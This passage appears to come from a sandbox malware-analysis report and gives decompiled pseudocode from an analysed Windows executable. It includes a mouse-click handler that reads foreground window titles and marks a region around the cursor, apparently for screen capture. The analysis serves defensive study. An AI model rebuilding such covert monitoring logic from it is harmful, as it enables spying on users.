    							 *((intOrPtr*)(_t161 + 4)) = _t217;
    						}
    						_t205 =  *((intOrPtr*)(_t204 + 4));
    						 *((intOrPtr*)(_t220 - 0x18)) = _t205;
    						if( *_t205 != _t212) {
    							L28:
    							_t206 =  *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x10)) + 4));
    							if( *((intOrPtr*)(_t206 + 8)) != _t212) {
    								L35:
    								_t152 =  *((intOrPtr*)(_t220 - 0x10));
    								L36:
    								_t213 = 1;
    								if( *((intOrPtr*)(_t129 + 0x38)) != _t213) {
    									L57:
    									 *(_t220 - 4) =  *(_t220 - 4) | 0xffffffff;
    									__imp__??1_Lockit@std@@QAE@XZ();
    									_t218 =  *((intOrPtr*)(_t220 - 0x14));
    									E0040F755(_t218 + 0x18);
    									_push(_t218);
    									L0043DD42();
    									_t131 =  *((intOrPtr*)(_t220 + 8));
    									 *((intOrPtr*)(_t152 + 0xc)) =  *((intOrPtr*)(_t152 + 0xc)) - 1;
    									 *_t131 =  *((intOrPtr*)(_t220 + 0xc));
    									 *[fs:0x0] =  *((intOrPtr*)(_t220 - 0xc));
    									return _t131;
    								}
    								while(_t217 !=  *((intOrPtr*)( *((intOrPtr*)(_t152 + 4)) + 4)) &&  *(_t217 + 0x38) == _t213) {
    									_t133 =  *((intOrPtr*)(_t217 + 4));
    									if(_t217 !=  *_t133) {
    										_t134 =  *_t133;
    										if( *(_t134 + 0x38) == 0) {
    											 *(_t134 + 0x38) = _t213;
    											 *( *((intOrPtr*)(_t217 + 4)) + 0x38) =  *( *((intOrPtr*)(_t217 + 4)) + 0x38) & 0x00000000;
    											E00410A77(_t152,  *((intOrPtr*)(_t217 + 4)));
    											_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 4))));
    										}
    										if( *( *((intOrPtr*)(_t134 + 8)) + 0x38) != _t213 ||  *( *_t134 + 0x38) != _t213) {
    											if( *( *_t134 + 0x38) == _t213) {
    												 *( *((intOrPtr*)(_t134 + 8)) + 0x38) = _t213;
    												 *(_t134 + 0x38) =  *(_t134 + 0x38) & 0x00000000;
    												E00410A33(_t152, _t134);
    												_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 4))));
    											}
    											 *(_t134 + 0x38) =  *( *((intOrPtr*)(_t217 + 4)) + 0x38);
    											 *( *((intOrPtr*)(_t217 + 4)) + 0x38) = _t213;
    											 *( *_t134 + 0x38) = _t213;
    											E00410A77(_t152,  *((intOrPtr*)(_t217 + 4)));
    											break;
    										} else {
    											L49:
    											 *(_t134 + 0x38) =  *(_t134 + 0x38) & 0x00000000;
    											_t217 =  *((intOrPtr*)(_t217 + 4));
    											continue;
    										}
    									}
    									_t134 =  *((intOrPtr*)(_t133 + 8));
    									if( *(_t134 + 0x38) == 0) {
    										 *(_t134 + 0x38) = _t213;
    										 *( *((intOrPtr*)(_t217 + 4)) + 0x38) =  *( *((intOrPtr*)(_t217 + 4)) + 0x38) & 0x00000000;
    										E00410A33(_t152,  *((intOrPtr*)(_t217 + 4)));
    										_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 4)) + 8));
    									}
    									if( *( *_t134 + 0x38) != _t213 ||  *( *((intOrPtr*)(_t134 + 8)) + 0x38) != _t213) {
    										if( *( *((intOrPtr*)(_t134 + 8)) + 0x38) == _t213) {
    											 *( *_t134 + 0x38) = _t213;
    											 *(_t134 + 0x38) =  *(_t134 + 0x38) & 0x00000000;
    											E00410A77(_t152, _t134);
    											_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t217 + 4)) + 8));
    										}
    										 *(_t134 + 0x38) =  *( *((intOrPtr*)(_t217 + 4)) + 0x38);
    										 *( *((intOrPtr*)(_t217 + 4)) + 0x38) = _t213;
    										 *( *((intOrPtr*)(_t134 + 8)) + 0x38) = _t213;
    										E00410A33(_t152,  *((intOrPtr*)(_t217 + 4)));
    										break;
    									} else {
    										goto L49;
    									}
    								}
    								 *(_t217 + 0x38) = _t213;
    								goto L57;
    							}
    							_t189 =  *0x4553c0; // 0x2acaa0
    							if( *_t212 != _t189) {
    								_t154 =  *((intOrPtr*)(_t217 + 8));
    								_t215 = _t217;
    								while(_t154 != _t189) {
    									_t215 = _t154;
    									_t154 =  *((intOrPtr*)(_t215 + 8));
    								}
    								 *((intOrPtr*)(_t206 + 8)) = _t215;
    								goto L35;
    							}
    							 *((intOrPtr*)(_t206 + 8)) =  *((intOrPtr*)(_t212 + 4));
    							goto L35;
    						} else {
    							_t191 =  *0x4553c0; // 0x2acaa0
    							if( *_t151 != _t191) {
    								_t207 =  *_t217;
    								_t155 = _t217;
    								while(_t207 != _t191) {
    									_t155 = _t207;
    									_t207 =  *_t155;
    								}
    								 *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x18)))) = _t155;
    								goto L28;
    							}
    							 *_t205 =  *((intOrPtr*)(_t212 + 4));
    							goto L28;
    						}
    					}
    					 *((intOrPtr*)( *_t212 + 4)) = _t129;
    					 *_t129 =  *_t212;
    					if(_t129 !=  *_t151) {
    						 *((intOrPtr*)(_t217 + 4)) =  *((intOrPtr*)(_t129 + 4));
    						 *((intOrPtr*)( *((intOrPtr*)(_t129 + 4)))) = _t217;
    						 *((intOrPtr*)( *((intOrPtr*)(_t220 - 0x18)))) =  *_t151;
    						 *((intOrPtr*)( *_t151 + 4)) = _t129;
    					} else {
    						 *((intOrPtr*)(_t217 + 4)) = _t129;
    					}
    					_t152 =  *((intOrPtr*)(_t220 - 0x10));
    					_t200 =  *((intOrPtr*)(_t152 + 4));
    					if( *((intOrPtr*)(_t200 + 4)) != _t212) {
    						_t201 =  *((intOrPtr*)(_t212 + 4));
    						if( *_t201 != _t212) {
    							 *((intOrPtr*)(_t201 + 8)) = _t129;
    						} else {
    							 *_t201 = _t129;
    						}
    					} else {
    						 *((intOrPtr*)(_t200 + 4)) = _t129;
    					}
    					 *((intOrPtr*)(_t220 - 0x14)) = _t212;
    					 *((intOrPtr*)(_t129 + 4)) =  *((intOrPtr*)(_t212 + 4));
    					 *((intOrPtr*)(_t129 + 0x38)) =  *((intOrPtr*)(_t212 + 0x38));
    					 *((intOrPtr*)(_t212 + 0x38)) =  *((intOrPtr*)(_t129 + 0x38));
    					_t129 = _t212;
    					goto L36;
    				}
    			}































    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Lockit@std@@$#825??0_??1_H_prolog

    C-Code - Quality: 91%
    			E00421E37(void* __ecx, intOrPtr _a4) {
    				struct tagRECT _v20;
    				struct tagPOINT _v28;
    				char _v540;
    				void* _t37;
    				void* _t45;
    				signed int _t56;
    				intOrPtr _t60;
    				intOrPtr _t62;
    				long _t63;
    				intOrPtr _t65;
    				void* _t69;
    				void* _t70;
    				void* _t71;
    				signed int _t74;
    				intOrPtr _t77;
    				struct HWND__* _t85;
    				void* _t86;
    
    				_t86 = __ecx;
    				_t60 = _a4;
    				if(_t60 == 0x201 || _t60 == 0xa1) {
    					if( *((intOrPtr*)(_t86 + 0x1800)) == 0) {
    						goto L35;
    					}
    					goto L3;
    				} else {
    					L3:
    					if(_t60 == 0x204 || _t60 == 0xa4) {
    						if( *((intOrPtr*)(_t86 + 0x1801)) == 0) {
    							goto L35;
    						}
    						goto L6;
    					} else {
    						L6:
    						if(_t60 == 0x207 || _t60 == 0xa7 || _t60 == 0x20a) {
    							if( *((intOrPtr*)(_t86 + 0x1802)) == 0) {
    								goto L35;
    							}
    							goto L10;
    						} else {
    							L10:
    							if( *((intOrPtr*)(_t86 + 0x17f2)) == 0 ||  *((intOrPtr*)(_t86 + 0x17e5)) == 0 ||  *((intOrPtr*)(_t86 + 0x64)) == 0 ||  *((intOrPtr*)(_t86 + 0x17df)) == 0) {
    								L35:
    								_t37 = 1;
    								return _t37;
    							} else {
    								if(_t60 != 0x20a) {
    									L16:
    									 *(_t86 + 0x2730) =  *(_t86 + 0x2730) + 1;
    									if( *(_t86 + 0x2730) %  *(_t86 + 0x1d44) != 0) {
    										goto L35;
    									}
    									_t85 = GetForegroundWindow();
    									if( *((intOrPtr*)(_t86 + 0x17f3)) == 0) {
    										L20:
    										GetCursorPos( &_v28);
    										_t77 =  *((intOrPtr*)(_t86 + 0x1a10));
    										_t45 = 0;
    										_t62 = _t77;
    										if(_t62 == 0) {
    											_push(0x19);
    											L30:
    											_pop(_t45);
    											L31:
    											if(_t77 != 5) {
    												_t63 = _v28.x;
    												_v20.right = _t63 + _t45;
    												_t65 = _v28.y;
    												_v20.left = _t63 - _t45;
    												_v20.top = _t65 - _t45;
    												_v20.bottom = _t65 + _t45;
    											} else {
    												GetWindowRect(_t85,  &_v20);
    											}
    											E00428FAA( &_v20);
    											E00425177(_t86,  &_v20);
    											goto L35;
    										}
    										_t69 = _t62 - 1;
    										if(_t69 == 0) {
    											_push(0x32);
    											goto L30;
    										}
    										_t70 = _t69 - 1;
    										if(_t70 == 0) {
    											_push(0x64);
    											goto L30;
    										} else {
    											_t71 = _t70 - 1;
    											if(_t71 == 0) {
    												_t45 = 0x96;
    											} else {
    												if(_t71 == 1) {
    													_t45 = 0xc8;
    												}
    											}
    											goto L31;
    										}
    									}
    									if(_t85 == 0) {
    										goto L35;
    									}
    									GetWindowTextA(_t85,  &_v540, 0x1ff);
    									if(E0042859F(_t86 + 0xd50,  &_v540) == 0) {
    										goto L35;
    									}
    									goto L20;
    								}
    								 *0x455ac4 =  *0x455ac4 + 1;
    								_t56 =  *0x455ac4; // 0x0
    								asm("cdq");
    								_t74 = 7;
    								if(_t56 % _t74 != 0) {
    									goto L35;
    								}
    								goto L16;
    							}
    						}
    					}
    				}
    			}





















    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Window$CursorForegroundRectText
    • String ID:
    • API String ID: 1070175250-0
    • Opcode ID: 5528efbbe1ba25cd42c46d22160b12a4c1287dcdfa9ae6eb6141e9eeb9e1cd1e
    • Instruction ID: 0b4df81992a9ce422479d8a7ebe859f9af9475d767fc3954263ebad31d5fc2e0
    • Opcode Fuzzy Hash: 5528efbbe1ba25cd42c46d22160b12a4c1287dcdfa9ae6eb6141e9eeb9e1cd1e
    • Instruction Fuzzy Hash: 4E411431B043259ADF34CB64A994ABB77A5BB64320F96403FE526C32A0E73C5845874D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E00409B7F(void* __ecx) {
    				struct HWND__* _t45;
    				struct HWND__* _t47;
    				intOrPtr* _t49;
    				intOrPtr* _t51;
    				void* _t52;
    				intOrPtr* _t53;
    				struct HWND__* _t54;
    				void* _t76;
    				intOrPtr* _t77;
    				void* _t79;
    
    				E0043E4E0(0x43f91c, _t79);
    				_t76 = __ecx;
    				 *((intOrPtr*)(_t79 - 0x1c)) = 0;
    				SendMessageTimeoutA( *(_t79 + 0xc),  *(__ecx + 4), 0, 0, 2, 0x96, _t79 - 0x18);
    				_t77 =  *((intOrPtr*)(_t76 + 0xc));
    				if(_t77 == 0) {
    					L14:
    					_push(0x4550cc);
    					L0043DE26();
    					L15:
    					 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
    					return  *((intOrPtr*)(_t79 + 8));
    				}
    				 *(_t79 + 0xc) = 0;
    				 *(_t79 - 4) = 0;
    				_push(_t79 + 0xc);
    				_push(0);
    				_push(0x44a5c4);
    				_push( *(_t79 - 0x18));
    				if( *_t77() < 0) {
    					L12:
    					_t45 =  *(_t79 + 0xc);
    					 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
    					if(_t45 != 0) {
    						 *((intOrPtr*)(_t45->i + 8))(_t45);
    					}
    					goto L14;
    				}
    				 *((intOrPtr*)(_t79 - 0x10)) = 0;
    				_t47 =  *(_t79 + 0xc);
    				 *(_t79 - 4) = 1;
    				 *((intOrPtr*)(_t47->i + 0x24))(_t47, _t79 - 0x10);
    				_t49 =  *((intOrPtr*)(_t79 - 0x10));
    				if(_t49 == 0) {
    					goto L12;
    				}
    				 *((intOrPtr*)( *_t49 + 0xf0))(_t49, _t79 - 0x1c);
    				_push( *((intOrPtr*)(_t79 - 0x1c)));
    				_t51 = E00409C88(_t79 - 0x14);
    				_t68 =  *_t51;
    				 *(_t79 - 4) = 2;
    				if( *_t51 == 0) {
    					_t52 = 0;
    				} else {
    					_t52 = E00409D10(_t68);
    				}
    				_push(_t52);
    				L0043DE26();
    				_t70 =  *((intOrPtr*)(_t79 - 0x14));
    				if( *((intOrPtr*)(_t79 - 0x14)) != 0) {
    					E004096DD(_t70);
    					 *((intOrPtr*)(_t79 - 0x14)) = 0;
    				}
    				_t53 =  *((intOrPtr*)(_t79 - 0x10));
    				 *(_t79 - 4) = 0;
    				if(_t53 != 0) {
    					 *((intOrPtr*)( *_t53 + 8))(_t53);
    				}
    				_t54 =  *(_t79 + 0xc);
    				 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
    				if(_t54 != 0) {
    					 *((intOrPtr*)(_t54->i + 8))(_t54);
    				}
    				goto L15;
    			}

    0x00409b84
    0x00409b9b
    0x00409ba2
    0x00409ba8
    0x00409bae
    0x00409bb3
    0x00409c68
    0x00409c6b
    0x00409c70
    0x00409c75
    0x00409c7d
    0x00409c85
    0x00409c85
    0x00409bb9
    0x00409bbf
    0x00409bc2
    0x00409bc3
    0x00409bc4
    0x00409bc9
    0x00409bd0
    0x00409c57
    0x00409c57
    0x00409c5a
    0x00409c60
    0x00409c65
    0x00409c65
    0x00000000
    0x00409c60
    0x00409bd6
    0x00409bd9
    0x00409be3
    0x00409be7
    0x00409bea
    0x00409bef
    0x00000000
    0x00000000
    0x00409bf8
    0x00409bfe
    0x00409c04
    0x00409c09
    0x00409c0b
    0x00409c11
    0x00409c1a
    0x00409c13
    0x00409c13
    0x00409c13
    0x00409c1f
    0x00409c20
    0x00409c25
    0x00409c2a
    0x00409c2c
    0x00409c31
    0x00409c31
    0x00409c34
    0x00409c37
    0x00409c3c
    0x00409c41
    0x00409c41
    0x00409c44
    0x00409c47
    0x00409c4d
    0x00409c52
    0x00409c52
    0x00000000

    APIs
    • __EH_prolog.LIBCMT ref: 00409B84
    • SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,00000002,00000096,?), ref: 00409BA8
    • #537.MFC42(004550CC), ref: 00409C70
      • Part of subcall function 00409C88: __EH_prolog.LIBCMT ref: 00409C8D
      • Part of subcall function 00409C88: #823.MFC42(0000000C,?,?,00409C09,?), ref: 00409C98
    • #537.MFC42(00000000,?), ref: 00409C20
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537H_prolog$#823MessageSendTimeout
    • String ID:
    • API String ID: 2797257802-0
    • Opcode ID: 85d35f7d2eb70984055e4c1ad253868b55dbbc38e514fd0d92ab0f76fddc8344
    • Instruction ID: de25aedf7ffac171624473ac2ffc7b1971f07a3ac4ce14d44d9307cc4de8349a
    • Opcode Fuzzy Hash: 85d35f7d2eb70984055e4c1ad253868b55dbbc38e514fd0d92ab0f76fddc8344
    • Instruction Fuzzy Hash: C8317A71E00249AFDF10DF94C8859AEBBB8EF49314F14857EF526AB292C7389E41CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0040F4AE(void* __ecx) {
    				intOrPtr* _t38;
    				void* _t39;
    				int _t44;
    				intOrPtr* _t50;
    				void* _t59;
    				intOrPtr _t61;
    				intOrPtr _t76;
    				struct HWND__* _t78;
    				void* _t80;
    				intOrPtr _t82;
    				void* _t83;
    				void* _t85;
    				intOrPtr _t86;
    				intOrPtr _t93;
    
    				E0043E4E0(0x440304, _t83);
    				_t86 = _t85 - 0x20;
    				_t80 = __ecx;
    				 *((char*)(_t83 - 0x2c)) =  *((intOrPtr*)(_t83 - 0xd));
    				 *((intOrPtr*)(_t83 - 0x28)) = 0;
    				 *((intOrPtr*)(_t83 - 0x24)) = 0;
    				 *((intOrPtr*)(_t83 - 0x20)) = 0;
    				_t38 =  *((intOrPtr*)(__ecx + 0x4c));
    				 *(_t83 - 4) = 0;
    				_t61 =  *_t38;
    				 *((intOrPtr*)(_t83 - 0x14)) = _t61;
    				if(_t61 != _t38) {
    					do {
    						_t78 =  *( *((intOrPtr*)(_t83 - 0x14)) + 0x10);
    						_t44 = IsWindow(_t78);
    						_t89 = _t44;
    						if(_t44 == 0) {
    							L3:
    							E0041009F(_t83 - 0x2c,  *((intOrPtr*)(_t83 - 0x14)) + 0x10);
    						} else {
    							_push(0);
    							_push(_t78);
    							_t50 = E0040FB99(_t61, _t89);
    							if(_t50 != 0) {
    								 *((intOrPtr*)( *_t50 + 4))(_t83 - 0x18, _t78);
    								 *(_t83 - 4) = 1;
    								E0040F419(_t80,  *((intOrPtr*)(_t83 - 0x14)) + 0x10, _t83 - 0x18);
    								_t18 = _t83 - 4;
    								 *_t18 =  *(_t83 - 4) & 0x00000000;
    								__eflags =  *_t18;
    								L0043DD36();
    							} else {
    								goto L3;
    							}
    						}
    						_t61 = _t83 - 0x14;
    						E004107BC(_t61);
    					} while ( *((intOrPtr*)(_t83 - 0x14)) !=  *((intOrPtr*)(_t80 + 0x4c)));
    				}
    				_t76 =  *((intOrPtr*)(_t83 - 0x28));
    				if(_t76 !=  *((intOrPtr*)(_t83 - 0x24))) {
    					_t59 = _t80 + 0x58;
    					_t82 = _t80 + 0x48;
    					_t93 = _t82;
    					do {
    						_push(_t61);
    						 *((intOrPtr*)(_t83 - 0x1c)) = _t86;
    						_push(_t59);
    						L0043DD3C();
    						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
    						E0040F818(E0040FFA5(_t82, _t93), _t76);
    						_t61 = _t82;
    						E0041024D(_t61, _t76);
    						_t76 = _t76 + 8;
    					} while (_t76 !=  *((intOrPtr*)(_t83 - 0x24)));
    				}
    				 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
    				_t39 = E0041007F();
    				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
    				return _t39;
    			}

    0x0040f4b3
    0x0040f4b8
    0x0040f4c3
    0x0040f4c5
    0x0040f4c8
    0x0040f4cb
    0x0040f4ce
    0x0040f4d1
    0x0040f4d4
    0x0040f4d7
    0x0040f4db
    0x0040f4de
    0x0040f4e0
    0x0040f4e3
    0x0040f4e7
    0x0040f4ed
    0x0040f4ef
    0x0040f4fe
    0x0040f508
    0x0040f4f1
    0x0040f4f1
    0x0040f4f2
    0x0040f4f3
    0x0040f4fc
    0x0040f518
    0x0040f527
    0x0040f52c
    0x0040f531
    0x0040f531
    0x0040f531
    0x0040f538
    0x00000000
    0x00000000
    0x00000000
    0x0040f4fc
    0x0040f53d
    0x0040f540
    0x0040f548
    0x0040f4e0
    0x0040f54d
    0x0040f553
    0x0040f555
    0x0040f558
    0x0040f558
    0x0040f55b
    0x0040f55b
    0x0040f55e
    0x0040f561
    0x0040f562
    0x0040f567
    0x0040f575
    0x0040f57b
    0x0040f57d
    0x0040f582
    0x0040f585
    0x0040f55b
    0x0040f58a
    0x0040f591
    0x0040f59b
    0x0040f5a4

    APIs
    • __EH_prolog.LIBCMT ref: 0040F4B3
    • IsWindow.USER32(?), ref: 0040F4E7
      • Part of subcall function 0040FB99: __EH_prolog.LIBCMT ref: 0040FB9E
      • Part of subcall function 0040FB99: GetClassNameA.USER32(?,?,0000001E), ref: 0040FBBA
    • #800.MFC42(?,?), ref: 0040F538
    • #535.MFC42(?), ref: 0040F562
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: H_prolog$#535#800ClassNameWindow
    • String ID:
    • API String ID: 2630809952-0
    • Opcode ID: adcfeb2e5935d57d66b35dfd998693ff31a092868872cfd0774450f34623d9f9
    • Instruction ID: c7a5eb719800f1096699db1758fa7df6fe720e7a17cf794fa1aa7bb230c13b38
    • Opcode Fuzzy Hash: adcfeb2e5935d57d66b35dfd998693ff31a092868872cfd0774450f34623d9f9
    • Instruction Fuzzy Hash: 22318471E00109ABCF24DFA9D8915EEFBB5AF59304F14407EE005B3682DB38AE44CB69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E004032D4(intOrPtr* __ecx) {
    				intOrPtr* _t28;
    				signed int _t29;
    				intOrPtr* _t31;
    				intOrPtr* _t41;
    				intOrPtr _t42;
    				void* _t45;
    				intOrPtr* _t46;
    				void* _t48;
    				intOrPtr _t51;
    				void* _t53;
    				void* _t54;
    				void* _t55;
    
    				E0043E4E0(E0043EE59, _t53);
    				_t55 = _t54 - 0xcc;
    				_t46 =  *((intOrPtr*)(_t53 + 8));
    				L0043DE2C();
    				L0042D180( *((intOrPtr*)( *__ecx + 0x18))(), _t46, _t46, _t46, _t45, _t48);
    				_push(_t53 - 0xd8);
    				_push(_t46);
    				_t28 =  *((intOrPtr*)( *__ecx + 0x20))();
    				_push(0x10);
    				L0043DD54();
    				_t41 = _t28;
    				 *((intOrPtr*)(_t53 - 0x10)) = _t41;
    				_t29 = 0;
    				 *(_t53 - 4) = 0;
    				if(_t41 != 0) {
    					_push(_t53 - 0xd8);
    					_push( *((intOrPtr*)( *_t46 + 0x14)));
    					_t29 = E00403862(_t41);
    				}
    				 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
    				 *((intOrPtr*)(_t53 + 8)) = _t29;
    				_push(0x44ac58);
    				_push(_t53 + 8);
    				L0043E528();
    				_pop(_t50);
    				_t31 =  *((intOrPtr*)(_t55 + 4));
    				_t42 =  *((intOrPtr*)(_t55 + 8));
    				_t51 =  *_t31;
    				if(_t42 >= 0) {
    					if( *((intOrPtr*)(_t51 + 0x68)) >= _t42) {
    						_t31 =  *((intOrPtr*)( *_t41 + 0x18))(_t31);
    					}
    				} else {
    					if( *((intOrPtr*)(_t51 + 0x6c)) == 0 ||  *((intOrPtr*)(_t51 + 0x68)) >= 3) {
    						_t31 =  *((intOrPtr*)( *_t41 + 0x18))(_t31);
    					}
    					 *((intOrPtr*)(_t51 + 0x6c)) =  *((intOrPtr*)(_t51 + 0x6c)) + 1;
    				}
    				return _t31;
    			}

    0x004032d9
    0x004032de
    0x004032e6
    0x004032f1
    0x004032ff
    0x0040330d
    0x0040330e
    0x00403311
    0x00403314
    0x00403316
    0x0040331c
    0x0040331e
    0x00403321
    0x00403325
    0x00403328
    0x00403330
    0x00403333
    0x00403336
    0x00403336
    0x0040333b
    0x0040333f
    0x00403345
    0x0040334a
    0x0040334b
    0x00403351
    0x00403352
    0x00403356
    0x0040335b
    0x0040335f
    0x0040337b
    0x00403380
    0x00403380
    0x00403361
    0x00403365
    0x00403370
    0x00403370
    0x00403373
    0x00403373
    0x00403384

    APIs
    • __EH_prolog.LIBCMT ref: 004032D9
    • #5628.MFC42(?), ref: 004032F1
    • #823.MFC42(00000010), ref: 00403316
    • _CxxThrowException.MSVCRT(?,0044AC58), ref: 0040334B
      • Part of subcall function 00403862: __EH_prolog.LIBCMT ref: 00403867
      • Part of subcall function 00403862: #350.MFC42(?,?,0040333B,?,?), ref: 00403873
      • Part of subcall function 00403862: #537.MFC42(?,?,?,0040333B,?,?), ref: 00403888
    Memory Dump Source
    • Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: H_prolog$#350#537#5628#823ExceptionThrow
    • String ID:
    • API String ID: 282172954-0
    • Opcode ID: cabefa4462e5422f42059f1b699b75f7e15a5ddfa5b80f17bc54afd35fa9a96c
    • Instruction ID: b1d81f24237b11e251e811c1c7bde02530ea3576f55a002acc26808acaeb840d
    • Opcode Fuzzy Hash: cabefa4462e5422f42059f1b699b75f7e15a5ddfa5b80f17bc54afd35fa9a96c
    • Instruction Fuzzy Hash: 9521D431900210EFC714EF69C485D9ABBB8AF58315F20896FF445D7290DB34DA80CB95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 36%
    			E00426573(void* __ecx, void* __edx, long long __fp0) {
    				char _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				void* __ebp;
    				void* _t12;
    				signed int _t17;
    				void* _t24;
    				void* _t28;
    				void* _t29;
    				long long* _t31;
    				intOrPtr _t32;
    
    				_t28 = __edx;
    				_t32 =  *0x4558e8; // 0x0
    				_t29 = __ecx;
    				if(_t32 != 0) {
    					return _t12;
    				}
    				 *0x4558e8 = 1;
    				__imp__time( &_v8);
    				__imp__difftime(_v8,  *((intOrPtr*)(__ecx + 0x17d8)));
    				 *_t31 = __fp0;
    				L0043E7A2();
    				_v12 = 0;
    				_pop(_t24);
    				_t17 = ( *(__ecx + 0x1d24) * 0x3c +  *((intOrPtr*)(__ecx + 0x1d28))) * 0x3c;
    				_v16 = _t17;
    				asm("fild qword [ebp-0xc]");
    				asm("fcompp");
    				asm("fnstsw ax");
    				asm("sahf");
    				st0 = st1;
    				if(_t17 < 0) {
    					L11:
    					 *0x4558e8 = 0;
    					return _t17;
    				}
    				_t17 = E0042900A(_t24);
    				if(_t17 == 0) {
    					goto L11;
    				}
    				if( *((intOrPtr*)(__ecx + 0x17f9)) != 0) {
